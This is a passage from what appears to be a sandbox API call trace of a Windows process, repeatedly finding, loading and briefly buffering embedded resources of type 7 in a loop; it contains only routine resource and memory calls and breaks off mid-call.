[0133.308] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.308] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.308] FindResourceW (hModule=0x400000, lpName=0x477, lpType=0x7) returned 0x491aa0 [0133.308] SizeofResource (hModule=0x400000, hResInfo=0x491aa0) returned 0xdc [0133.308] LoadResource (hModule=0x400000, hResInfo=0x491aa0) returned 0x4a1258 [0133.308] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.308] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.308] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.308] FindResourceW (hModule=0x400000, lpName=0x478, lpType=0x7) returned 0x491ab0 [0133.308] SizeofResource (hModule=0x400000, hResInfo=0x491ab0) returned 0xdc [0133.308] LoadResource (hModule=0x400000, hResInfo=0x491ab0) returned 0x4a1334 [0133.309] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.309] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.309] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.309] FindResourceW (hModule=0x400000, lpName=0x479, lpType=0x7) returned 0x491ac0 [0133.309] SizeofResource (hModule=0x400000, hResInfo=0x491ac0) returned 0xdc [0133.309] LoadResource (hModule=0x400000, hResInfo=0x491ac0) returned 0x4a1410 [0133.309] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.310] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.310] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.310] FindResourceW (hModule=0x400000, lpName=0x47a, lpType=0x7) returned 0x491ad0 [0133.310] SizeofResource (hModule=0x400000, hResInfo=0x491ad0) returned 0xdc [0133.310] LoadResource (hModule=0x400000, hResInfo=0x491ad0) returned 0x4a14ec [0133.310] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.310] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.310] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.310] FindResourceW (hModule=0x400000, lpName=0x47b, lpType=0x7) returned 0x491ae0 [0133.310] SizeofResource (hModule=0x400000, hResInfo=0x491ae0) returned 0xdc [0133.310] LoadResource (hModule=0x400000, hResInfo=0x491ae0) returned 0x4a15c8 [0133.310] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.311] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.311] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.311] FindResourceW (hModule=0x400000, lpName=0x47c, lpType=0x7) returned 0x491af0 [0133.311] SizeofResource (hModule=0x400000, hResInfo=0x491af0) returned 0xdc [0133.311] LoadResource (hModule=0x400000, hResInfo=0x491af0) returned 0x4a16a4 [0133.311] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.311] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.312] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.312] FindResourceW (hModule=0x400000, lpName=0x47d, lpType=0x7) returned 0x491b00 [0133.312] SizeofResource (hModule=0x400000, hResInfo=0x491b00) returned 0xdc [0133.312] LoadResource (hModule=0x400000, hResInfo=0x491b00) returned 0x4a1780 [0133.312] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.312] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.312] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.312] FindResourceW (hModule=0x400000, lpName=0x47e, lpType=0x7) returned 0x491b10 [0133.312] SizeofResource (hModule=0x400000, hResInfo=0x491b10) returned 0xdc [0133.312] LoadResource (hModule=0x400000, hResInfo=0x491b10) returned 0x4a185c [0133.312] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.313] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.313] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.313] FindResourceW (hModule=0x400000, lpName=0x47f, lpType=0x7) returned 0x491b20 [0133.313] SizeofResource (hModule=0x400000, hResInfo=0x491b20) returned 0xdc [0133.313] LoadResource (hModule=0x400000, hResInfo=0x491b20) returned 0x4a1938 [0133.313] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.313] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.313] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.313] FindResourceW (hModule=0x400000, lpName=0x480, lpType=0x7) returned 0x491b30 [0133.313] SizeofResource (hModule=0x400000, hResInfo=0x491b30) returned 0xdc [0133.314] LoadResource (hModule=0x400000, hResInfo=0x491b30) returned 0x4a1a14 [0133.314] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.314] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.314] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.314] FindResourceW (hModule=0x400000, lpName=0x481, lpType=0x7) returned 0x491b40 [0133.314] SizeofResource (hModule=0x400000, hResInfo=0x491b40) returned 0xdc [0133.314] LoadResource (hModule=0x400000, hResInfo=0x491b40) returned 0x4a1af0 [0133.314] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.315] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.315] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.315] FindResourceW (hModule=0x400000, lpName=0x482, lpType=0x7) returned 0x491b50 [0133.315] SizeofResource (hModule=0x400000, hResInfo=0x491b50) returned 0xdc [0133.315] LoadResource (hModule=0x400000, hResInfo=0x491b50) returned 0x4a1bcc [0133.315] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.315] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.315] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.315] FindResourceW (hModule=0x400000, lpName=0x483, lpType=0x7) returned 0x491b60 [0133.315] SizeofResource (hModule=0x400000, hResInfo=0x491b60) returned 0xdc [0133.315] LoadResource (hModule=0x400000, hResInfo=0x491b60) returned 0x4a1ca8 [0133.315] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.316] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.316] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.316] FindResourceW (hModule=0x400000, lpName=0x484, lpType=0x7) returned 0x491b70 [0133.316] SizeofResource (hModule=0x400000, hResInfo=0x491b70) returned 0xdc [0133.316] LoadResource (hModule=0x400000, hResInfo=0x491b70) returned 0x4a1d84 [0133.316] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.316] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.317] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.317] FindResourceW (hModule=0x400000, lpName=0x485, lpType=0x7) returned 0x491b80 [0133.317] SizeofResource (hModule=0x400000, hResInfo=0x491b80) returned 0xdc [0133.317] LoadResource (hModule=0x400000, hResInfo=0x491b80) returned 0x4a1e60 [0133.317] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.319] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.319] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.319] FindResourceW (hModule=0x400000, lpName=0x486, lpType=0x7) returned 0x491b90 [0133.319] SizeofResource (hModule=0x400000, hResInfo=0x491b90) returned 0xdc [0133.319] LoadResource (hModule=0x400000, hResInfo=0x491b90) returned 0x4a1f3c [0133.319] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.320] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.320] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.320] FindResourceW (hModule=0x400000, lpName=0x487, lpType=0x7) returned 0x491ba0 [0133.320] SizeofResource (hModule=0x400000, hResInfo=0x491ba0) returned 0xdc [0133.320] LoadResource (hModule=0x400000, hResInfo=0x491ba0) returned 0x4a2018 [0133.320] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.320] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.320] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.320] FindResourceW (hModule=0x400000, lpName=0x488, lpType=0x7) returned 0x491bb0 [0133.320] SizeofResource (hModule=0x400000, hResInfo=0x491bb0) returned 0xdc [0133.320] LoadResource (hModule=0x400000, hResInfo=0x491bb0) returned 0x4a20f4 [0133.320] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.321] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.321] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.321] FindResourceW (hModule=0x400000, lpName=0x489, lpType=0x7) returned 0x491bc0 [0133.321] SizeofResource (hModule=0x400000, hResInfo=0x491bc0) returned 0xdc [0133.321] LoadResource (hModule=0x400000, hResInfo=0x491bc0) returned 0x4a21d0 [0133.321] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.321] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.321] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.322] FindResourceW (hModule=0x400000, lpName=0x48a, lpType=0x7) returned 0x491bd0 [0133.322] SizeofResource (hModule=0x400000, hResInfo=0x491bd0) returned 0xdc [0133.322] LoadResource (hModule=0x400000, hResInfo=0x491bd0) returned 0x4a22ac [0133.322] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.322] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.322] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.322] FindResourceW (hModule=0x400000, lpName=0x48b, lpType=0x7) returned 0x491be0 [0133.322] SizeofResource (hModule=0x400000, hResInfo=0x491be0) returned 0xdc [0133.322] LoadResource (hModule=0x400000, hResInfo=0x491be0) returned 0x4a2388 [0133.322] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.323] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.323] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.323] FindResourceW (hModule=0x400000, lpName=0x48c, lpType=0x7) returned 0x491bf0 [0133.323] SizeofResource (hModule=0x400000, hResInfo=0x491bf0) returned 0xdc [0133.323] LoadResource (hModule=0x400000, hResInfo=0x491bf0) returned 0x4a2464 [0133.323] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.323] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.323] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.323] FindResourceW (hModule=0x400000, lpName=0x48d, lpType=0x7) returned 0x491c00 [0133.323] SizeofResource (hModule=0x400000, hResInfo=0x491c00) returned 0xdc [0133.323] LoadResource (hModule=0x400000, hResInfo=0x491c00) returned 0x4a2540 [0133.323] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.324] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.324] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.324] FindResourceW (hModule=0x400000, lpName=0x48e, lpType=0x7) returned 0x491c10 [0133.324] SizeofResource (hModule=0x400000, hResInfo=0x491c10) returned 0xdc [0133.324] LoadResource (hModule=0x400000, hResInfo=0x491c10) returned 0x4a261c [0133.324] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.324] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.325] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.325] FindResourceW (hModule=0x400000, lpName=0x48f, lpType=0x7) returned 0x491c20 [0133.325] SizeofResource (hModule=0x400000, hResInfo=0x491c20) returned 0xdc [0133.325] LoadResource (hModule=0x400000, hResInfo=0x491c20) returned 0x4a26f8 [0133.325] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.325] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.325] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.325] FindResourceW (hModule=0x400000, lpName=0x490, lpType=0x7) returned 0x491c30 [0133.325] SizeofResource (hModule=0x400000, hResInfo=0x491c30) returned 0xdc [0133.325] LoadResource (hModule=0x400000, hResInfo=0x491c30) returned 0x4a27d4 [0133.325] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.325] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.325] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.325] FindResourceW (hModule=0x400000, lpName=0x491, lpType=0x7) returned 0x491c40 [0133.325] SizeofResource (hModule=0x400000, hResInfo=0x491c40) returned 0xdc [0133.325] LoadResource (hModule=0x400000, hResInfo=0x491c40) returned 0x4a28b0 [0133.325] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.325] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.325] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.326] FindResourceW (hModule=0x400000, lpName=0x492, lpType=0x7) returned 0x491c50 [0133.326] SizeofResource (hModule=0x400000, hResInfo=0x491c50) returned 0xdc [0133.326] LoadResource (hModule=0x400000, hResInfo=0x491c50) returned 0x4a298c [0133.326] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.326] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.326] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.326] FindResourceW (hModule=0x400000, lpName=0x493, lpType=0x7) returned 0x491c60 [0133.326] SizeofResource (hModule=0x400000, hResInfo=0x491c60) returned 0xdc [0133.326] LoadResource (hModule=0x400000, hResInfo=0x491c60) returned 0x4a2a68 [0133.326] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.326] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.326] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.326] FindResourceW (hModule=0x400000, lpName=0x494, lpType=0x7) returned 0x491c70 [0133.326] SizeofResource (hModule=0x400000, hResInfo=0x491c70) returned 0xdc [0133.326] LoadResource (hModule=0x400000, hResInfo=0x491c70) returned 0x4a2b44 [0133.326] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.326] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.326] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.326] FindResourceW (hModule=0x400000, lpName=0x495, lpType=0x7) returned 0x491c80 [0133.326] SizeofResource (hModule=0x400000, hResInfo=0x491c80) returned 0xdc [0133.326] LoadResource (hModule=0x400000, hResInfo=0x491c80) returned 0x4a2c20 [0133.326] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.327] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.327] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.327] FindResourceW (hModule=0x400000, lpName=0x496, lpType=0x7) returned 0x491c90 [0133.327] SizeofResource (hModule=0x400000, hResInfo=0x491c90) returned 0xdc [0133.327] LoadResource (hModule=0x400000, hResInfo=0x491c90) returned 0x4a2cfc [0133.327] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.327] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.327] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.327] FindResourceW (hModule=0x400000, lpName=0x497, lpType=0x7) returned 0x491ca0 [0133.327] SizeofResource (hModule=0x400000, hResInfo=0x491ca0) returned 0xdc [0133.327] LoadResource (hModule=0x400000, hResInfo=0x491ca0) returned 0x4a2dd8 [0133.327] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.327] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.327] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.327] FindResourceW (hModule=0x400000, lpName=0x498, lpType=0x7) returned 0x491cb0 [0133.327] SizeofResource (hModule=0x400000, hResInfo=0x491cb0) returned 0xdc [0133.327] LoadResource (hModule=0x400000, hResInfo=0x491cb0) returned 0x4a2eb4 [0133.327] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.328] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.328] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.328] FindResourceW (hModule=0x400000, lpName=0x499, lpType=0x7) returned 0x491cc0 [0133.328] SizeofResource (hModule=0x400000, hResInfo=0x491cc0) returned 0xdc [0133.328] LoadResource (hModule=0x400000, hResInfo=0x491cc0) returned 0x4a2f90 [0133.328] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.328] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.328] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.328] FindResourceW (hModule=0x400000, lpName=0x49a, lpType=0x7) returned 0x491cd0 [0133.328] SizeofResource (hModule=0x400000, hResInfo=0x491cd0) returned 0xdc [0133.328] LoadResource (hModule=0x400000, hResInfo=0x491cd0) returned 0x4a306c [0133.328] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.328] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.328] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.328] FindResourceW (hModule=0x400000, lpName=0x49b, lpType=0x7) returned 0x491ce0 [0133.328] SizeofResource (hModule=0x400000, hResInfo=0x491ce0) returned 0xdc [0133.328] LoadResource (hModule=0x400000, hResInfo=0x491ce0) returned 0x4a3148 [0133.328] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.329] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.329] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.329] FindResourceW (hModule=0x400000, lpName=0x49c, lpType=0x7) returned 0x491cf0 [0133.329] SizeofResource (hModule=0x400000, hResInfo=0x491cf0) returned 0xdc [0133.329] LoadResource (hModule=0x400000, hResInfo=0x491cf0) returned 0x4a3224 [0133.329] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.329] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.329] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.329] FindResourceW (hModule=0x400000, lpName=0x49d, lpType=0x7) returned 0x491d00 [0133.329] SizeofResource (hModule=0x400000, hResInfo=0x491d00) returned 0xdc [0133.329] LoadResource (hModule=0x400000, hResInfo=0x491d00) returned 0x4a3300 [0133.329] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.329] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.329] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.329] FindResourceW (hModule=0x400000, lpName=0x49e, lpType=0x7) returned 0x491d10 [0133.329] SizeofResource (hModule=0x400000, hResInfo=0x491d10) returned 0xdc [0133.329] LoadResource (hModule=0x400000, hResInfo=0x491d10) returned 0x4a33dc [0133.329] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.329] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.330] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.330] FindResourceW (hModule=0x400000, lpName=0x49f, lpType=0x7) returned 0x491d20 [0133.330] SizeofResource (hModule=0x400000, hResInfo=0x491d20) returned 0xdc [0133.330] LoadResource (hModule=0x400000, hResInfo=0x491d20) returned 0x4a34b8 [0133.330] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.330] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.330] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.330] FindResourceW (hModule=0x400000, lpName=0x4a0, lpType=0x7) returned 0x491d30 [0133.330] SizeofResource (hModule=0x400000, hResInfo=0x491d30) returned 0xdc [0133.330] LoadResource (hModule=0x400000, hResInfo=0x491d30) returned 0x4a3594 [0133.330] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.330] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.330] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.330] FindResourceW (hModule=0x400000, lpName=0x4a1, lpType=0x7) returned 0x491d40 [0133.330] SizeofResource (hModule=0x400000, hResInfo=0x491d40) returned 0xdc [0133.330] LoadResource (hModule=0x400000, hResInfo=0x491d40) returned 0x4a3670 [0133.330] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.330] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.331] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.331] FindResourceW (hModule=0x400000, lpName=0x4a2, lpType=0x7) returned 0x491d50 [0133.331] SizeofResource (hModule=0x400000, hResInfo=0x491d50) returned 0xdc [0133.331] LoadResource (hModule=0x400000, hResInfo=0x491d50) returned 0x4a374c [0133.331] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.331] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.331] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.331] FindResourceW (hModule=0x400000, lpName=0x4a3, lpType=0x7) returned 0x491d60 [0133.331] SizeofResource (hModule=0x400000, hResInfo=0x491d60) returned 0xdc [0133.331] LoadResource (hModule=0x400000, hResInfo=0x491d60) returned 0x4a3828 [0133.331] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.331] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.331] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.331] FindResourceW (hModule=0x400000, lpName=0x4a4, lpType=0x7) returned 0x491d70 [0133.331] SizeofResource (hModule=0x400000, hResInfo=0x491d70) returned 0xdc [0133.331] LoadResource (hModule=0x400000, hResInfo=0x491d70) returned 0x4a3904 [0133.331] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.331] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.332] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.332] FindResourceW (hModule=0x400000, lpName=0x4a5, lpType=0x7) returned 0x491d80 [0133.332] SizeofResource (hModule=0x400000, hResInfo=0x491d80) returned 0xdc [0133.332] LoadResource (hModule=0x400000, hResInfo=0x491d80) returned 0x4a39e0 [0133.332] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.332] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.332] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.332] FindResourceW (hModule=0x400000, lpName=0x4a6, lpType=0x7) returned 0x491d90 [0133.332] SizeofResource (hModule=0x400000, hResInfo=0x491d90) returned 0xdc [0133.332] LoadResource (hModule=0x400000, hResInfo=0x491d90) returned 0x4a3abc [0133.332] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.332] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.332] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.332] FindResourceW (hModule=0x400000, lpName=0x4a7, lpType=0x7) returned 0x491da0 [0133.332] SizeofResource (hModule=0x400000, hResInfo=0x491da0) returned 0xdc [0133.332] LoadResource (hModule=0x400000, hResInfo=0x491da0) returned 0x4a3b98 [0133.332] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.332] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.332] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.332] FindResourceW (hModule=0x400000, lpName=0x4a8, lpType=0x7) returned 0x491db0 [0133.332] SizeofResource (hModule=0x400000, hResInfo=0x491db0) returned 0xdc [0133.332] LoadResource (hModule=0x400000, hResInfo=0x491db0) returned 0x4a3c74 [0133.333] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.333] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.333] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.333] FindResourceW (hModule=0x400000, lpName=0x4a9, lpType=0x7) returned 0x491dc0 [0133.333] SizeofResource (hModule=0x400000, hResInfo=0x491dc0) returned 0xdc [0133.333] LoadResource (hModule=0x400000, hResInfo=0x491dc0) returned 0x4a3d50 [0133.333] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.333] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.333] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.333] FindResourceW (hModule=0x400000, lpName=0x4aa, lpType=0x7) returned 0x491dd0 [0133.333] SizeofResource (hModule=0x400000, hResInfo=0x491dd0) returned 0xdc [0133.333] LoadResource (hModule=0x400000, hResInfo=0x491dd0) returned 0x4a3e2c [0133.333] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.333] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.333] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.333] FindResourceW (hModule=0x400000, 